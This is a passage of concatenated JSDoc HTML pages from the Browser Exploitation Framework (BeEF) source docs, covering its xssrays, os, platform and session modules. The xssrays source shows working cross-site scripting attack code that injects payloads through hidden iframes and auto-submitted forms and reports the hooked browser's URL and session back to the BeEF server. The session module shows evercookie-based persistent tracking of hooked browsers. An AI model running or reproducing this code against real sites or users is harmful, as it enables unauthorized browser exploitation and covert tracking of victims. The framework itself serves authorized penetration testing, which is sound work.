pocurl = poc.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
//TODO: if the url is something like example.com/?param=1 then a second slash will be added, like example.com//<xss>.
//TODO: this need to checked and the slash shouldn't be added in this particular case
url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
}
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
if(beef.browser.isIE()){
try {
var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
} catch (e) {
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
}else{
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
iframe.time = beef.net.xssrays.timestamp();
if (method === 'GET') {
if(beef.browser.isC() || beef.browser.isS()){
var datauri = btoa(url);
iframe.src = "data:text/html;base64," + datauri;
}else{
iframe.src = url;
}
document.body.appendChild(iframe);
beef.debug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
} else if (method === 'POST') {
/*
* ++++++++++ check for XSS in body parameters (POST) ++++++++++
*/
var form = '<form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
poc = '';
pocurl = action + "?";
paramsPos = 0;
beef.debug("Form action [" + action + "]");
for (var i in params) {
if (params.hasOwnProperty(i)) {
poc = vector.input.replace(/XSS/g, "alert(1)");
poc = poc.replace(/<\/script>/g, "<\/scr\"+\"ipt>");
pocurl += i + '=' + (urlencode ? encodeURIComponent(poc) : poc); // + '&';
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
beef.debug("form param[" + i + "] = " + params[i].toString());
paramsPos++;
}
}
form += '<\/form>';
document.body.appendChild(iframe);
beef.debug("Creating form [" + form + "]");
iframe.contentWindow.document.writeln(form);
iframe.contentWindow.document.writeln('<script>document.createElement("form").submit.apply(document.forms[0]);<\/script>');
beef.debug("Submitting form");
}
});
},
/**
* run the jobs (run functions added to the stack), and clean the shit (iframes) from the DOM after a timeout value
*/
runJobs: function() {
var that = this;
this.totalConnections = this.stack.length;
that.getNextJob();
setInterval(function() {
var numOfConnections = 0;
for (var i = 0; i < document.getElementsByTagName('iframe').length; i++) {
var iframe = document.getElementsByTagName('iframe')[i];
numOfConnections++;
//beef.debug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
try{
if (iframe) {
beef.net.xssrays.complete();
beef.debug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
}catch(e){
beef.debug("Exception [" + e.toString() + "] when cleaning iframes.")
}
}
}
if (numOfConnections == 0) {
clearTimeout(this);
}
}, this.cleanUpTimeout);
return this;
},
timestamp: function() {
return parseInt(new Date().getTime().toString().substring(0, 10));
},
escape: function(str) {
str = str.toString();
str = str.replace(/</g, '&lt;');
str = str.replace(/>/g, '&gt;');
str = str.replace(/\u0022/g, '&quot;');
str = str.replace(/\u0027/g, '&#39;');
str = str.replace(/\\/g, '&#92;');
return str;
}
};
beef.regCmp('beef.net.xssrays');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/os.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: os.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: os.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/** @namespace beef.os */
beef.os = {
ua: navigator.userAgent,
/**
* Detect default browser (IE only)
* Written by unsticky
* http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
* @return {string}
*/
getDefaultBrowser: function() {
var result = "Unknown"
try {
var mt = document.mimeType;
if (mt) {
if (mt == "Safari Document") result = "Safari";
if (mt == "Firefox HTML Document") result = "Firefox";
if (mt == "Chrome HTML Document") result = "Chrome";
if (mt == "HTML Document") result = "Internet Explorer";
if (mt == "Opera Web Document") result = "Opera";
}
} catch (e) {
beef.debug("[os] getDefaultBrowser: "+e.message);
}
return result;
},
// the likelihood that we hook Windows 3.11 (which has only Win in the UA string) is zero in 2015
/**
* @return {boolean}
*/
isWin311: function() {
return (this.ua.match('(Win16)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinNT4: function() {
return (this.ua.match('(Windows NT 4.0)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin95: function() {
return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinCE: function() {
return (this.ua.match('(Windows CE)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin98: function() {
return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinME: function() {
return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin2000: function() {
return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin2000SP1: function() {
return (this.ua.match('Windows NT 5.01 ')) ? true : false;
},
/**
* @return {boolean}
*/
isWinXP: function() {
return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinServer2003: function() {
return (this.ua.match('(Windows NT 5.2)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinVista: function() {
return (this.ua.match('(Windows NT 6.0)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin7: function() {
return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin8: function() {
return (this.ua.match('(Windows NT 6.2)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin81: function() {
return (this.ua.match('(Windows NT 6.3)')) ? true : false;
},
/**
* @return {boolean}
*/
isWin10: function() {
return (this.ua.match('Windows NT 10.0')) ? true : false;
},
/**
* @return {boolean}
*/
isOpenBSD: function() {
return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isSunOS: function() {
return (this.ua.indexOf('SunOS') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isLinux: function() {
return (this.ua.match('(Linux)|(X11)')) ? true : false;
},
/**
* @return {boolean}
*/
isMacintosh: function() {
return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
},
/**
* @return {boolean}
*/
isOsxYosemite: function(){ // TODO
return (this.ua.match('(OS X 10_10)|(OS X 10.10)')) ? true : false;
},
/**
* @return {boolean}
*/
isOsxMavericks: function(){ // TODO
return (this.ua.match('(OS X 10_9)|(OS X 10.9)')) ? true : false;
},
/**
* @return {boolean}
*/
isOsxSnowLeopard: function(){ // TODO
return (this.ua.match('(OS X 10_8)|(OS X 10.8)')) ? true : false;
},
/**
* @return {boolean}
*/
isOsxLeopard: function(){ // TODO
return (this.ua.match('(OS X 10_7)|(OS X 10.7)')) ? true : false;
},
/**
* @return {boolean}
*/
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
/**
* @return {boolean}
*/
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isIpad: function() {
return (this.ua.indexOf('iPad') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isIpod: function() {
return (this.ua.indexOf('iPod') != -1) ? true : false;
},
/**
* @return {boolean}
*/
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
/**
* @return {boolean}
*/
isAndroid: function() {
return (this.ua.match('Android')) ? true : false;
},
/**
* @return {boolean}
*/
isBlackBerry: function() {
return (this.ua.match('BlackBerry')) ? true : false;
},
/**
* @return {boolean}
*/
isWebOS: function() {
return (this.ua.match('webOS')) ? true : false;
},
/**
* @return {boolean}
*/
isQNX: function() {
return (this.ua.match('QNX')) ? true : false;
},
/**
* @return {boolean}
*/
isBeOS: function() {
return (this.ua.match('BeOS')) ? true : false;
},
/**
* @return {boolean}
*/
isAros: function() {
return (this.ua.match('AROS')) ? true : false;
},
/**
* @return {boolean}
*/
isWindows: function() {
return (this.ua.match('Windows')) ? true : false;
},
/**
* @return {string}
*/
getName: function() {
if(this.isWindows()){
return 'Windows';
}
if(this.isMacintosh()) {
return 'OSX';
}
//Nokia
if(this.isNokia()) {
if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
}
// BlackBerry
if(this.isBlackBerry()) return 'BlackBerry OS';
// Android
if(this.isAndroid()) return 'Android';
// SunOS
if(this.isSunOS()) return 'SunOS';
//Linux
if(this.isLinux()) return 'Linux';
//iPhone
if (this.isIphone()) return 'iOS';
//iPad
if (this.isIpad()) return 'iOS';
//iPod
if (this.isIpod()) return 'iOS';
//others
if(this.isQNX()) return 'QNX';
if(this.isBeOS()) return 'BeOS';
if(this.isWebOS()) return 'webOS';
if(this.isAros()) return 'AROS';
return 'unknown';
},
/**
* Get OS architecture.
* This may not be the same as the browser arch or CPU arch.
* ie, 32bit OS on 64bit hardware
*/
getArch: function() {
var arch = 'unknown';
try {
var arch = platform.os.architecture;
if (!!arch)
return arch;
} catch (e) {}
return arch;
},
/**
* Get OS family
*/
getFamily: function() {
var family = 'unknown';
try {
var family = platform.os.family;
if (!!family)
return family;
} catch (e) {}
return arch;
},
/**
* Get OS name
* @return {string}
*/
getVersion: function(){
//Windows
if(this.isWindows()) {
if (this.isWin10()) return '10';
if (this.isWin81()) return '8.1';
if (this.isWin8()) return '8';
if (this.isWin7()) return '7';
if (this.isWinVista()) return 'Vista';
if (this.isWinXP()) return 'XP';
if (this.isWinServer2003()) return 'Server 2003';
if (this.isWin2000SP1()) return '2000 SP1';
if (this.isWin2000()) return '2000';
if (this.isWinME()) return 'Millenium';
if (this.isWinNT4()) return 'NT 4';
if (this.isWinCE()) return 'CE';
if (this.isWin95()) return '95';
if (this.isWin98()) return '98';
}
// OS X
if(this.isMacintosh()) {
if (this.isOsxYosemite()) return '10.10';
if (this.isOsxMavericks()) return '10.9';
if (this.isOsxSnowLeopard()) return '10.8';
if (this.isOsxLeopard()) return '10.7';
}
// TODO add Android/iOS version detection
}
};
beef.regCmp('beef.net.os');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/platform.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: platform</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: platform</h1>
<section>
<header>
<h2>platform</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Platform.js
Copyright 2014-2018 Benjamin Tan
Copyright 2011-2013 John-David Dalton
Available under MIT license</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1">line 1</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Members</h3>
<h4 class="name" id=".description"><span class="type-signature">(static) </span>description<span class="type-signature"> :string|null</span></h4>
<div class="description">
<p>The platform description.</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">string</span>
|
<span class="param-type">null</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1047">line 1047</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".layout"><span class="type-signature">(static) </span>layout<span class="type-signature"> :string|null</span></h4>
<div class="description">
<p>The name of the browser's layout engine.</p>
<p>The list of common layout engines include:
"Blink", "EdgeHTML", "Gecko", "Trident" and "WebKit"</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">string</span>
|
<span class="param-type">null</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1058">line 1058</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".manufacturer"><span class="type-signature">(static) </span>manufacturer<span class="type-signature"> :string|null</span></h4>
<div class="description">
<p>The name of the product's manufacturer.</p>
<p>The list of manufacturers include:
"Apple", "Archos", "Amazon", "Asus", "Barnes & Noble", "BlackBerry",
"Google", "HP", "HTC", "LG", "Microsoft", "Motorola", "Nintendo",
"Nokia", "Samsung" and "Sony"</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">string</span>
|
<span class="param-type">null</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1071">line 1071</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".name"><span class="type-signature">(static) </span>name<span class="type-signature"> :string|null</span></h4>
<div class="description">
<p>The name of the browser/environment.</p>
<p>The list of common browser names include:
"Chrome", "Electron", "Firefox", "Firefox for iOS", "IE",
"Microsoft Edge", "PhantomJS", "Safari", "SeaMonkey", "Silk",
"Opera Mini" and "Opera"</p>
<p>Mobile versions of some browsers have "Mobile" appended to their name:
eg. "Chrome Mobile", "Firefox Mobile", "IE Mobile" and "Opera Mobile"</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">string</span>
|
<span class="param-type">null</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1087">line 1087</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".os"><span class="type-signature">(static) </span>os<span class="type-signature"> :Object</span></h4>
<div class="description">
<p>The name of the operating system.</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">Object</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1132">line 1132</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".platform"><span class="type-signature">(static) </span>platform<span class="type-signature"> :Object</span></h4>
<div class="description">
<p>The platform object.</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">Object</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1039">line 1039</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".prerelease"><span class="type-signature">(static) </span>prerelease<span class="type-signature"> :string|null</span></h4>
<div class="description">
<p>The alpha/beta release indicator.</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">string</span>
|
<span class="param-type">null</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1095">line 1095</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".product"><span class="type-signature">(static) </span>product<span class="type-signature"> :string|null</span></h4>
<div class="description">
<p>The name of the product hosting the browser.</p>
<p>The list of common products include:</p>
<p>"BlackBerry", "Galaxy S4", "Lumia", "iPad", "iPod", "iPhone", "Kindle",
"Kindle Fire", "Nexus", "Nook", "PlayBook", "TouchPad" and "Transformer"</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">string</span>
|
<span class="param-type">null</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1108">line 1108</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".toString"><span class="type-signature">(static) </span>toString<span class="type-signature"></span></h4>
<div class="description">
<p>Returns <code>platform.description</code> when the platform object is coerced to a string.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line604">line 604</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".ua"><span class="type-signature">(static) </span>ua<span class="type-signature"> :string|null</span></h4>
<div class="description">
<p>The browser's user agent string.</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">string</span>
|
<span class="param-type">null</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1116">line 1116</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".version"><span class="type-signature">(static) </span>version<span class="type-signature"> :string|null</span></h4>
<div class="description">
<p>The browser/environment version.</p>
</div>
<h5>Type:</h5>
<ul>
<li>
<span class="param-type">string</span>
|
<span class="param-type">null</span>
</li>
</ul>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line1124">line 1124</a>
</li></ul></dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".parse"><span class="type-signature">(static) </span>parse<span class="signature">(ua<span class="signature-attributes">opt</span>)</span><span class="type-signature"> → {Object}</span></h4>
<div class="description">
<p>Creates a new platform object.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Attributes</th>
<th>Default</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>ua</code></td>
<td class="type">
<span class="param-type">Object</span>
|
<span class="param-type">string</span>
</td>
<td class="attributes">
<optional><br>
</td>
<td class="default">
navigator.userAgent
</td>
<td class="description last"><p>The user agent string or
context object.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="lib_platform.js.html">lib/platform.js</a>, <a href="lib_platform.js.html#line254">line 254</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>A platform object.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Object</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/session.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: session.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: session.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides basic session functions.
* @namespace beef.session
*/
beef.session = {
hook_session_id_length: 80,
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(),
beefhook: "<%= @hook_session_name %>",
/**
* Gets a string which will be used to identify the hooked browser session
*
* @example: var hook_session_id = beef.session.get_hook_session_id();
*/
get_hook_session_id: function() {
// check if the browser is already known to the framework
var id = this.ec.evercookie_cookie(beef.session.beefhook);
if (typeof id == 'undefined') {
var id = this.ec.evercookie_userdata(beef.session.beefhook);
}
if (typeof id == 'undefined') {
var id = this.ec.evercookie_window(beef.session.beefhook);
}
// if the browser is not known create a hook session id and set it
if ((typeof id == 'undefined') || (id == null)) {
id = this.gen_hook_session_id();
this.set_hook_session_id(id);
}
// return the hooked browser session identifier
return id;
},
/**
* Sets a string which will be used to identify the hooked browser session
*
* @example: beef.session.set_hook_session_id('RANDOMSTRING');
*/
set_hook_session_id: function(id) {
// persist the hook session id
this.ec.evercookie_cookie(beef.session.beefhook, id);
this.ec.evercookie_userdata(beef.session.beefhook, id);
this.ec.evercookie_window(beef.session.beefhook, id);
},
/**
* Generates a random string using the chars in hook_session_id_chars.
*
* @example: beef.session.gen_hook_session_id();
*/
gen_hook_session_id: function() {
// init the return value
var hook_session_id = "";
// construct the random string
for(var i=0; i<this.hook_session_id_length; i++) {
var rand_num = Math.floor(Math.random()*this.hook_session_id_chars.length);
hook_session_id += this.hook_session_id_chars.charAt(rand_num);
}
return hook_session_id;
}
};
beef.regCmp('beef.session');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/timeout.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: timeout.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: timeout.js</h1>
<section>
<article>
